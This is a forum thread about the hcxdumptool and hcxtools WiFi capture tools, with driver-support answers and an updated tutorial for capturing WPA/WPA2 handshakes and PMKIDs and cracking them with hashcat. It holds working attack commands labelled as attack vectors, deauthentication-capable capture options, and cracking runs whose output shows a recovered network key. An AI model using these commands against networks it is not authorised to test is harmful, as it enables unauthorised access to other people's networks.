| 
		
	
	
	
		
	Posts: 1,058Threads: 2
 Joined: Jun 2017
 
	
		
		
		01-25-2021, 11:09 AM 
(This post was last modified: 01-25-2021, 12:55 PM by ZerBea.)
		
	 
		Your  assumption is correct. I noticed that, too. 
Some devices probe their entire NVRAM to hcxdumptool:
 Code: NVRAMNVRAM WARNING
 NVRAM WARNING: ERR 0x10
 NVRAM WARNING: Err = 0x01
 NVRAM WARNING: Err = 0x02
 NVRAM WARNING: Err = 0x06
 NVRAM WARNING: Err = 0x10
 NVRAM WARNING: Err = 0x1p
 NVRAM WARNING: Err=7x13
 NVRAM WARNING: Errel WiFi
 NVRAMERROR
 NVRAM_Err_0x10
 
	
	
	
		
	Posts: 33Threads: 3
 Joined: Feb 2019
 
	
	
		hi zerbea, hope all is good,  sorry for this question not really related to hashcat or hcxdumptool.just a curiosity, will hcxdumptool work with ath10k driver, i really don't get that. some say that injection work some not. i never buy a device if hcxdumptool does not work, lol.
	 
	
	
	
		
	Posts: 1,058Threads: 2
 Joined: Jun 2017
 
	
		
		
		02-13-2021, 09:58 AM 
(This post was last modified: 02-13-2021, 03:27 PM by ZerBea.)
		
	 
		I'm fine, thanks and I hope you're fine, too. 
First a general answer: 
hcxdumptool is working on every driver (e.g.: mt76, rt2800usb, ath9k) that is able to run full monitor mode, full packet injection, accept ioctl() system calls and doesn't depend on NETLINK. 
Unfortunately some drivers are hit by issues that (e.g. freeze/timeout on ath9k):
https://bugzilla.kernel.org/show_bug.cgi?id=207397 
Now to answer your question: atk10k will not work due to firmware/driver limitations:
https://wireless.wiki.kernel.org/en/user...ers/ath10k Code: firmware does not support association to the same AP from different virtual STA interfaces (driver prints “ath10k: Failed to add peer XX:XX:XX:XX:XX:XX for VDEV: X” in that case)packet injection isn't supported yet
 applying ath9k regulatory domain hack patch from OpenWRT causes firmware crash (reason: regulatory hint function is never called and ath10k never sends scan channel list to the firmware which in turn causes firmware to crash on scan)
 tx rate is reported as 6mbps due to firmware limitation (no tx rate information in tx completions); instead see /sys/kernel/debug/ieee80211/phyX/ath10k/fw_stats
 WEP doesn't work with AP_VLANs - frames are sent unencrypted (observed on: 999.999.0.636, 10.2.4.20-1, 10.1.467.2-1)
 TX speeds are extremely poor on certain chips (QCA6174 is one). A patch solves the issue in most cases
Please notice: 
We are talking about Linux kernel stock firmware/drivers
https://git.kernel.org/pub/scm/linux/ker...rmware.git
https://git.kernel.org/pub/scm/linux/ker...h=v5.10.15 
and not about third party firmware/drivers/patches included in special penetration testing distributions (e.g.: K A L I). 
BTW: 
I do not use K A L I , because I'm not a penetration tester!
 
I fully agree: 
I'll never buy a device if I know that the kernel stock driver doesn't support full monitor mode, full packet injection and ioctl() system calls. 
But some times I get a device to test some third party drivers, e.g. new rtw88 stack (Realtek):
https://github.com/kimocoder/realtek_rtwifi 
If you are a Linux newbee (or an unexperienced K A L I user), I can't recommend to use third party or patched firmware/drivers, because you'll run into several issues (at the latest on a kernel update).
 
A good start to get an information about driver, driver updates, issues and chipset:
https://wireless.wiki.kernel.org/en/users/Drivers
https://patchwork.kernel.org/project/lin...less/list/
https://bugzilla.kernel.org/
https://deviwiki.com/wiki/ 
But be warned: Manufacturers often change the chipset, but will use the same case and customary packing!
	 
	
	
	
		
	Posts: 63Threads: 10
 Joined: Nov 2017
 
	
	
		Hello ZerBea, when using hcxeiutool -h command and following the example listed at the bottom of the help, the last line of the example where it runs hashcat, is the "dump.pcapng" supposed to be "test.22000" instead?
 I'm assuming so, unless I'm missing something important.  Thanks.
 
	
	
	
		
	Posts: 1,058Threads: 2
 Joined: Jun 2017
 
	
		
		
		02-25-2021, 11:05 AM 
(This post was last modified: 02-25-2021, 09:18 PM by ZerBea.)
		
	 
		Hi walterlacka. 
Thanks for reporting that ugly copy and paste error. 
Fixed by this commit:
https://github.com/ZerBea/hcxtools/commi...28af54dbf6 
	
	
	
		
	Posts: 5Threads: 0
 Joined: Mar 2021
 
	
	
		 (07-22-2017, 10:07 AM)ZerBea Wrote:  basic tutorial about the features to capture passwords from wlantraffic
 1.
 Choose a place where you do expect to receive many, many clients.
 run wlandump-ng or wlanresponse for a while (one or more hours) using this options:
 
 on a notebook
 wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20
 
 on a raspberry
 wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
 wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L
 
 
 mydevice is your WLAN device (it must be running allready in monitor mode on a real device - do not use virtual devices like mon0).
 
 Please download and use the attached test.cap for this tutorial
 Extract and copy the cap to a folder and open a terminal inside.
 
 2.
 Let's check the cap:
 
 $ wlancapinfo -i test.cap
 input file.......: test.cap
 magic file number: 0xa1b2c3d4 (cap/pcap)
 major version....: 2
 minor version....: 4
 data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
 packets inside...: 6
 last pcap error..: flawless
 
 The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there are informations inside, other tools are not able to strip.
 
 
 Let's convert the cap:
 
 $ wlancap2hcx -o test.hccapx -e wordlist test.cap
 start reading from test.cap
 6 packets processed (6 wlan, 0 lan, 0 loopback)
 found 1 wpa2 AES Cipher, HMAC-SHA1
 found 1 valid wpa handshake (by wlandump-ng/wlanresponse)
 
 You can see that there's a valid WPA2 handshakles inside and that
 wlandump-ng/wlanresponse initiates the authentication with the client.
 No accesspint captured - there is no need to capture an accesspoint to get the data!
 We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx).
 
 $ ls
 test.hccapx test.cap  wordlist
 
 now sort our wordlist
 $ sort wordlist | uniq > wordlistsort
 you need to do this, because there are many dupes inside.
 
 $ ls
 test.hccapx test.cap  wordlist wordlistsort
 
 now run hashcat
 $ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
 hashcat (v3.6.0-247-g8f2cbb26) starting...
 Session..........: hashcat
 Status...........: Cracked
 Hash.Type........: WPA/WPA2
 Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
 Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
 Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
 Guess.Base.......: File (wordlistsort)
 Guess.Queue......: 1/1 (100.00%)
 Speed.Dev.#1.....:        0 H/s (0.36ms)
 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
 Progress.........: 2/2 (100.00%)
 Rejected.........: 0/2 (0.00%)
 Restore.Point....: 0/2 (0.00%)
 Candidates.#1....: AXNDFNEU -> UPC501953949
 HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8
 
 Take a look into the potfile and you can imagine what's going on.
 You cracked the hash, using the captured password from wlantraffic.
 
 It's a good Idea to add/copy/cat the wordlist to your wordlist(s) - everytime you run wlancap2hcx on new cap files.
 
Hello ZerBea, I hope you are doing well. 
I tried to understand and reproduce this exact same procedure in hopes to recover the PSK if its present in the network traffic. As these tools are not available anymore because they are updated to the latest hcxtools, I am unable to reproduce this.
 
Can you please update this exact tutorial using the latest set of hcxtools?
 
regards.
	 
	
	
	
		
	Posts: 1,058Threads: 2
 Joined: Jun 2017
 
	
	
		Thanks, I'm fine and I you you'll be fine, too. 
hcxtools > v6 and hcxdumptool making life a little bit more easier and received a lot of improvements, but the basics are the same (that include filter modes, filter lists and Berkeley Packet Filter). Only default formats changed to pcapng. 
capture traffic -> convert to hashcat (or john) hash format -> run hashcat (or john)
 
The same applies to the attack vectors: 
attack vector 1 target AP (PMKID) 
attack vector 2 CLIENT (M2) 
attack vector 3 AP <-> CLIENT connection (PMKID, M1, M2, M3, M4) 
attack vector 4 EAP (EAP-ID, EAP TLS, RADIUS) 
or any combination of this.
 Code: attack vector 1, 2, 3, 4 (request EAP-ID, only)$ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --active_beacon
 
 attack vector  2,  (request EAP-ID, only)
 $ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --active_beacon --disable_deauthentication --disable_ap_attacks -t 300
 
 attack vector 1, 3
 $ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --disable_client_attacks
 
 for attack vector 4 please read --help
If you're an experienced user (you know what you're doing, you are able to create a BPF, you don't need a beautiful real time status display), I recommend to use hcxlabtool from the wifi_laboratory series.
 
The basics of converting traffic to hashcat/john formats are the same, too, except that the default formats changed: 
hcxpcapngtool: 
default hash format now -> 22000 EAPOL + PMKID 
storing possible PSKs, received from WiFi traffic can be done by -E -I -U 
 
Example dump file is here:
https://github.com/evilsocket/pwnagotchi...nctest.zip 
$ hcxpcapngtool -o eapol.22000 -E wordlist test.pcap 
$ hashcat -m 22000 --nonce-error-corrections=8 eapol.22000 wordlist 
In this example, we must use  --nonce-error-corrections=8, because I converted the origin pcapng file to cap/pcap format (a few tools don't understand pcapng). This format is a very basic format and we loose some important information, stored in pcapng format.
 
hcxhashtool is new. Depending on the options you can filter the output hash file. That can be done by bash tools, too, because 22000 is no longer a binary format. 
hcxeiutool is new. Depending on the options you can pre-process hcxpcapngtool -E -I -U output to a raw word list that can be used in combination with rules.
	 
	
	
	
		
	Posts: 5Threads: 0
 Joined: Mar 2021
 
	
	
		 (03-31-2021, 10:12 AM)ZerBea Wrote:  Thanks, I'm fine and I you you'll be fine, too.hcxtools > v6 and hcxdumptool making life a little bit more easier and received a lot of improvements, but the basics are the same (that include filter modes, filter lists and Berkeley Packet Filter). Only default formats changed to pcapng.
 capture traffic -> convert to hashcat (or john) hash format -> run hashcat (or john)
 
 The same applies to the attack vectors:
 attack vector 1 target AP (PMKID)
 attack vector 2 CLIENT (M2)
 attack vector 3 AP <-> CLIENT connection (PMKID, M1, M2, M3, M4)
 attack vector 4 EAP (EAP-ID, EAP TLS, RADIUS)
 or any combination of this.
 
 
 Code: attack vector 1, 2, 3, 4 (request EAP-ID, only)$ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --active_beacon
 
 attack vector  2,  (request EAP-ID, only)
 $ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --active_beacon --disable_deauthentication --disable_ap_attacks -t 300
 
 attack vector 1, 3
 $ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --disable_client_attacks
 
 for attack vector 4 please read --help
If you're an experienced user (you know what you're doing, you are able to create a BPF, you don't need a beautiful real time status display), I recommend to use hcxlabtool from the wifi_laboratory series.
 
 The basics of converting traffic to hashcat/john formats are the same, too, except that the default formats changed:
 hcxpcapngtool:
 default hash format now -> 22000 EAPOL + PMKID
 storing possible PSKs, received from WiFi traffic can be done by -E -I -U
 
 Example dump file is here:
 https://github.com/evilsocket/pwnagotchi...nctest.zip
 $ hcxpcapngtool -o eapol.22000 -E wordlist test.pcap
 $ hashcat -m 22000 --nonce-error-corrections=8 eapol.22000 wordlist
 In this example, we must use  --nonce-error-corrections=8, because I converted the origin pcapng file to cap/pcap format (a few tools don't understand pcapng). This format is a very basic format and we loose some important information, stored in pcapng format.
 
 hcxhashtool is new. Depending on the options you can filter the output hash file. That can be done by bash tools, too, because 22000 is no longer a binary format.
 hcxeiutool is new. Depending on the options you can pre-process hcxpcapngtool -E -I -U output to a raw word list that can be used in combination with rules.
 
Thanks for such detailed information, cleared a lot of doubts, much appreciated! 
However, when I run hashcat with attack mode 2200 ($ hashcat -m 22000 --nonce-error-corrections=8 eapol.22000 wordlist) I get an error message stating that there is no module named module_02200.dll (Cannot load module ./module/module_02200.dll). I have checked the modules directory and it is not there for some reason. I am using the default hashcat version 6.1.1 provided by hashcat.net on windows.
 
Btw, also tested this with hashcat version 4.1.1, same error.
	 
	
	
	
		
	Posts: 1,058Threads: 2
 Joined: Jun 2017
 
	
	
		Maybe you're running an old version of hashcat. 
hashcat 6.1.1 support 22000 and 22001. 
hashcat 4.1.1 is ancient.
 Code: $ hashcat -m 22000 --benchmarkhashcat (v6.1.1-144-g9e474e1e8) starting in benchmark mode...
 CUDA API (CUDA 11.2)
 ====================
 * Device #1: GeForce GTX 1080 Ti, 10875/11175 MB, 28MCU
 
 OpenCL API (OpenCL 1.2 CUDA 11.2.162) - Platform #1 [NVIDIA Corporation]
 ========================================================================
 * Device #2: GeForce GTX 1080 Ti, skipped
 
 Benchmark relevant options:
 ===========================
 * --optimized-kernel-enable
 
 Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095)
 
 Speed.#1.........:   620.7 kH/s (90.65ms) @ Accel:32 Loops:256 Thr:1024 Vec:1
 
 Started: Wed Mar 31 18:33:56 2021
 Stopped: Wed Mar 31 18:33:59 2021
 
	
	
	
		
	Posts: 5Threads: 0
 Joined: Mar 2021
 
	
		
		
		03-31-2021, 10:36 PM 
(This post was last modified: 03-31-2021, 11:53 PM by sata.)
		
	 
		 (03-31-2021, 06:37 PM)ZerBea Wrote:  Maybe you're running an old version of hashcat.hashcat 6.1.1 support 22000 and 22001.
 hashcat 4.1.1 is ancient.
 
 
 Code: $ hashcat -m 22000 --benchmarkhashcat (v6.1.1-144-g9e474e1e8) starting in benchmark mode...
 CUDA API (CUDA 11.2)
 ====================
 * Device #1: GeForce GTX 1080 Ti, 10875/11175 MB, 28MCU
 
 OpenCL API (OpenCL 1.2 CUDA 11.2.162) - Platform #1 [NVIDIA Corporation]
 ========================================================================
 * Device #2: GeForce GTX 1080 Ti, skipped
 
 Benchmark relevant options:
 ===========================
 * --optimized-kernel-enable
 
 Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095)
 
 Speed.#1.........:  620.7 kH/s (90.65ms) @ Accel:32 Loops:256 Thr:1024 Vec:1
 
 Started: Wed Mar 31 18:33:56 2021
 Stopped: Wed Mar 31 18:33:59 2021
 
Thanks, I downloaded latest hashcat and installed it again, it worked!
	 |